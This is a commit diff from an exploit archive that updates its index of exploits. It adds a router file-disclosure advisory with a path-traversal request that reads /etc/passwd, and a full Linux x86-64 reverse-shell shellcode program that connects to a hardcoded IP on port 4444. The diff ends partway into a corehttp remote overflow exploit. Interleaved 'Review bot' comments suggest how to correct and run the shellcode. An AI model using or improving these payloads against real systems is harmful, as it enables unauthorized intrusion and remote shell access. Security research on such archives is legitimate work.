DB: 2016-01-07

10 new exploits
This commit is contained in:
Offensive Security 2016-01-07 05:01:40 +00:00
parent cf1ca0a5f7
commit 53d9096a7c
14 changed files with 1707 additions and 611 deletions


@ -1505,7 +1505,7 @@ id,file,description,date,author,platform,type,port
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 - (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0
1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0
@ -3888,7 +3888,7 @@ id,file,description,date,author,platform,type,port
4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0
4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln",2007-07-28,t0pP8uZz,php,webapps,0
4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0
4243,platforms/linux/remote/4243.c,"corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0
4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0
4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / Remote SQL Injection Vulnerabilities",2007-07-30,k1tk4t,php,webapps,0
@ -7474,7 +7474,7 @@ id,file,description,date,author,platform,type,port
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0
7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0
7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0
7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion Vulnerability",2009-02-02,ahmadbady,php,webapps,0
@ -9632,7 +9632,7 @@ id,file,description,date,author,platform,type,port
10345,platforms/windows/local/10345.py,"gAlan - (.galan) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0
10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0
10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0
10349,platforms/linux/dos/10349.py,"CoreHTTP Web server off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
10349,platforms/linux/dos/10349.py,"CoreHTTP Web server <= 0.5.3.1 - off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI & RFI & XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0
10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0
@ -14291,7 +14291,7 @@ id,file,description,date,author,platform,type,port
16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0
16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0
16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0
@ -15389,7 +15389,7 @@ id,file,description,date,author,platform,type,port
17715,platforms/windows/local/17715.html,"F-Secure Multiple Products ActiveX SEH Overwrite Vulnerability (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0
17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 - Blind SQL Injection Vulnerability",2011-08-25,evilsocket,php,webapps,0
17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0
17719,platforms/windows/remote/17719.rb,"RealVNC Authentication Bypass",2011-08-26,metasploit,windows,remote,0
17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,metasploit,windows,remote,0
17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 - SQL Injection Vulnerability",2011-08-26,evilsocket,php,webapps,0
17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0
17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0
@ -15648,7 +15648,7 @@ id,file,description,date,author,platform,type,port
18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0
18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0
18015,platforms/cgi/remote/18015.rb,"HP Power Manager 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile Vulnerability",2011-10-21,rgod,windows,remote,0
18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0
18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0
@ -16881,7 +16881,7 @@ id,file,description,date,author,platform,type,port
19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0
19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
@ -30264,7 +30264,7 @@ id,file,description,date,author,platform,type,port
33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - (.slk) NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0
33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 - Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0
33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0
33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
@ -32648,7 +32648,7 @@ id,file,description,date,author,platform,type,port
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0
36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443
36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
@ -33335,7 +33335,7 @@ id,file,description,date,author,platform,type,port
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"Wordpress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -35399,13 +35399,15 @@ id,file,description,date,author,platform,type,port
39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
@ -35422,3 +35424,11 @@ id,file,description,date,author,platform,type,port
39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0
39176,platforms/php/webapps/39176.html,"TOA Cross Site Request Forgery Vulnerability",2014-05-08,"High-Tech Bridge",php,webapps,0
39177,platforms/multiple/dos/39177.py,"VLC Media Player '.wav' File Memory Corruption Vulnerability",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
39178,platforms/php/webapps/39178.txt,"CMS Touch pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
39179,platforms/php/webapps/39179.txt,"CMS Touch news.php News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
39180,platforms/windows/dos/39180.pl,"Winamp '.flv' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39181,platforms/windows/dos/39181.py,"Intel Indeo Video Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39182,platforms/multiple/dos/39182.py,"RealPlayer '.3gp' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",multiple,dos,0
39183,platforms/windows/dos/39183.py,"ALLPlayer '.wav' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
39185,platforms/lin_x86-64/shellcode/39185.c,"TCP Reverse Shell with Password Prompt - 151 bytes",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
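Review bot: The retitled 39152 row keeps the path `platforms/linux/shellcode/39152..c` with a doubled dot (the neighbouring 39151 context row has the same `39151..c`); if the file on disk is actually `39152.c`, this index entry will not resolve, so the path should be checked against the tree before the rename is kept. The new 39185 row files a Linux x86-64 shellcode under `lin_x86-64` while the similar 39152 entry sits under `linux`, which looks inconsistent if 39152 is also 64-bit — I cannot tell from the index alone. The remaining hunks only insert ` - ` separators into titles and need no change.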



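--- a/platforms/hardware/webapps/39184.txt
+++ b/platforms/hardware/webapps/39184.txt
@@ -0,0 +1,32 @@
+Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
+Author : Ahmed Sultan (0x4148)
+Email : 0x4148@gmail.com
+MediaAccess TG788vn with Cisco firewall http config is vulnerable to
+critical unauthenticated file disclosure flaw,
+POC
+Request:
+POST /scgi-bin/platform.cgi HTTP/1.1
+Host: xx.xx.xx.xx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 164
+button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00
+Response:
+HTTP/1.0 200 OK
+Date: Sat, 01 Jan 2011 00:00:45 GMT
+Server: Embedded HTTP Server.
+Connection: close
+loic_ipsec:x:500:500:xauth:/:/bin/cli
+the http server is running with root privileges , which mean that the
+attacker might escalate the exploit for further critical attacks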
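Review bot: The closing claim that the HTTP server runs as root is not supported by the PoC — /etc/passwd is world-readable, so retrieving it says nothing about the server's uid; either show a root-only file such as /etc/shadow being returned or state it as an assumption, e.g. `(assumed, not verified: the CGI may run as root)`. The advisory also omits the affected firmware version, a vendor-notification date and any CVE, which makes the entry hard to triage. The request shows the traversal plus `%00` terminator in `thispage` reaching a file open, but it is not stated whether the other form fields are required or whether `thispage` is the only parameter that reaches the filesystem.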


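--- a/platforms/lin_x86-64/shellcode/39185.c
+++ b/platforms/lin_x86-64/shellcode/39185.c
@@ -0,0 +1,184 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title: tcp reverse shell with password prompt in 151 bytes
+*Author: Sathish kumar
+*Contact: https://www.linkedin.com/in/sathish94
+* Copyright: (c) 2016 iQube. (http://iQube.io)
+* Release Date: January 6, 2016
+*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
+*Tested On: Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
+* ./bindshell
+* nc localhost 4444
+*
+*/
+/*
+* NOTE: This C code binds on port 4444
+* The top of this file contains the .nasm source code
+* The Port can be Reconfigured According to your needs
+* Instructions for changing port number
+* Port obtainer change the port value accorddingly
+* port.py
+* import socket
+* port = 4444
+* hex(socket.htons(port))
+* python port.py
+* Result : 0x5c11
+* Replace the obtained value in the shellcode to change the port number
+* For building the from .nasm source use
+* nasm -felf64 filename.nasm -o filename.o
+* ld filename.o -o filename
+* To inspect for nulls
+* objdump -M intel -D filename.o
+global _start
+_start:
+jmp sock
+prompt: db 'Passcode' ; initilization of prompt data
+; sock = socket(AF_INET, SOCK_STREAM, 0)
+; AF_INET = 2
+; SOCK_STREAM = 1
+; syscall number 41
+sock:
+xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
+xor rsi, rsi
+mul rsi
+push byte 0x2 ;pusing argument to the stack
+pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
+inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
+push byte 0x29 ; pushing the syscall number into the rax by using stack
+pop rax
+syscall
+; copying the socket descripter from rax to rdi register so that we can use it further
+xchg rax, rdi
+; server.sin_family = AF_INET
+; server.sin_port = htons(PORT)
+; server.sin_addr.s_addr = INADDR_ANY
+; bzero(&server.sin_zero, 8)
+; setting up the data sctructure
+xor rax, rax
+push rax ; bzero(&server.sin_zero, 8)
+mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
+not ebx
+mov dword [rsp-4], ebx
+sub rsp , 4 ; adjust the stack
+push word 0x5c11 ; port 4444 in network byte order
+push word 0x02 ; AF_INET
+push rsp
+pop rsi
+; connecting to the remote ip
+push 0x2a
+pop rax
+push 0x10
+pop rdx
+syscall
+; initilization of dup2
+push 0x3
+pop rsi ; setting argument to 3
+duplicate:
+dec esi
+mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
+syscall
+jne duplicate
+xor rax, rax
+inc al ; rax register to value 1 syscall for write
+push rax
+pop rdi ; rdi register to value 1
+lea rsi, [rel prompt]
+xor rdx, rdx ; xor the rdx register to clear the previous values
+push 0xe
+pop rdx
+syscall
+; checking the password using read
+password_check:
+push rsp
+pop rsi
+xor rax, rax ; system read syscall value is 0 so rax is set to 0
+syscall
+push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
+pop rax
+lea rdi, [rel rsi]
+scasd ; comparing the user input and stored password in the stack
+jne Exit
+execve: ; Execve format , execve("/bin/sh", 0 , 0)
+xor rsi , rsi
+mul rsi ; zeroed rax , rdx register
+push ax ; terminate string with null
+mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
+push rbx
+push rsp
+pop rdi ; set RDI
+push byte 0x3b ; execve syscall number (59)
+pop rax
+syscall
+Exit:
+;Exit shellcode if password is wrong
+push 0x3c
+pop rax ;syscall number for exit is 60
+xor rdi, rdi
+syscall
+*/
+#include<stdio.h>
+#include<string.h>
+unsigned char code[] = \
+"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb"
+//ip address which can be obtained by
+/* example 10.1.75.202
+* hex value equivalent = 0a.01.4b.ca
+*/
+//replace this with the ip address of the system to which the shell should connect
+"\x0a\x01\x4b\xca"
+"\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68"
+//Port number this can be obtained from the above instrcutions
+"\x11\x5c"
+"\x66\x6a\x02\x54\x5e\x6a\x2a\x58\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\xa8\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68"
+//Password this can be obtained by
+/*
+* python
+* password = 'hack'
+* (password[::-1]).encode('hex')
+* Reuslt : 6b636168
+* This is stored in reverse beacuse of stack
+*
+*
+*/
+"\x68\x61\x63\x6b"
+"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";
+main()
+{
+printf("Shellcode Length: %d\n", (int)strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}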
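Review bot: The header comment contradicts the code: `NOTE: This C code binds on port 4444`, the `bindshell.c` build line and `nc localhost 4444` describe a bind shell, but the assembly calls `connect` (syscall 0x2a) to the address embedded at `"\x0a\x01\x4b\xca"`, so the usage should read `nc -l 4444` on that host before running the stub, with the NOTE line changed to `NOTE: this stub connects out to the IP/port embedded below`. The "password" gate is a single `scasd`, which compares only the first four bytes of the `read` buffer (length 0xe inherited from the write's rdx), so any input starting with `hack` passes; a comment stating that only a 4-byte prefix is checked would stop readers treating it as real authentication. The byte array also appears to omit the `not ebx` (`f7 d3`) that the NASM listing uses to avoid nulls in the address — `\xbb` is followed directly by the raw IP and then `\x89\x5c\x24\xfc` — so the listing and the bytes no longer match and an address containing a zero octet will reintroduce a null; I have not assembled it to confirm. `main()` should be `int main(void)` for C99 and later compilers.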


@ -1,332 +1,332 @@
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* [*] target : dual.fakehalo.lan:5555 *
* [*] return address : 0xbfffea60 *
* [*] *sprocket replacement : 0xbfffec60 *
* *
* [*] attempting to connect: dual.fakehalo.lan:5555. *
* [*] successfully connected: dual.fakehalo.lan:5555. *
* [*] sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* [*] closing connection. *
* *
* [*] attempting to connect: dual.fakehalo.lan:7979. *
* [*] successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
